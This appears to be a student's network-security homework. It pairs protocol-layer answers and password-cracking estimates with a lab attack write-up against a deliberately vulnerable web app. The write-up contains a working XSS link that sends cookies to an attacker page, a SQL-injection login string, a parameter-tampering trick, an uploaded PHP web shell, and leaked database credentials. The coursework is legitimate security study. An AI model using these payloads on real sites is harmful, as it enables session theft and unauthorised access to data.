CS-285: Network Security

1. SSL — Transport Layer
2. PGP — Application Layer
3. IPsec — Network Layer
4. WPA — Link Layer
5. HTTPS — Transport Layer
6. HTTP Auth — Application Layer

1. SSL — Secure Sockets Layer provides confidentiality by using symmetric cryptography.
2. PGP — Pretty Good Privacy provides confidentiality using the symmetric ciphers. To distribute the secret key used in the symmetric cipher, it encrypts the secret key using the receiver's public key.
3. IPsec — IP Security provides confidentiality and source authentication by creating a symmetrically encrypted tunnel between two networks.
4. WPA — Wi-Fi Protected Access provides confidentiality and source authentication by creating a symmetric tunnel between a wireless acess point and client.
5. HTTPS — Secure Hypertext Transfer Protocol provides confidentiality and source authentication using symmetric key cryptography where keys are trusted via a certificate authority.
6. HTTP Auth — Hypertext Transfer Protocol Authentication protects web resources by providing a method of authenticating access.

1. A four letter password has 26⁴ possible combinations. The password will likely be cracked halfway through those, so at a rate of checking one password per second, it will take 456976 / 2 = 228488 seconds ≈ 63.5 hours to crack.
2. If the cracker is able to tell when each individual is correct of incorrect, then each position need only be tried once for a maximum of 26 tests. The password is expected to be found halfway through, so it should be cracked after 13 seconds.

1. The cookie for the site has the name PSESSID with the value crv7nbq6bi9nu8o2rr0usi1i60.
2. An attack link to send the user's cookie is http://129.59.89.23/pictures/search.php?query=%3Cscript%20type='text/javascript'%3Edocument.location='http://129.59.89.23/badguy.php?addr=will@dhappy.org%26ssid='%2Bescape(document.cookie)%3C/script%3E

To login using a SQL injection, one can use the username cs285web' or ''=' with any password on the page http://129.59.89.23/users/login.php. The secret information is:

• The birthdate is 08/15/1989.
• The SSN number is: 666-77-8888

The copyright key for monkey is 1639434. This is retrieved by going to the url http://129.59.89.23/pictures/highquality.php?picid=43&key=highquality. This was found by buying an image and then changing the picid.

1. The first attack was to upload PHP File Manager as an image file. It is available at: http://129.59.89.23/upload/test/test.php

2. Tracing the inclusions from the file, the database authentication information is:

   • Username: wackopicko
   • Password: webvuln!@#

3. One obvious attack is to get tradebux. This is accomplished with the script added to http://129.59.89.23/upload/give_wholcomb_bux.php. Loading the file gives $user 1000000 bux.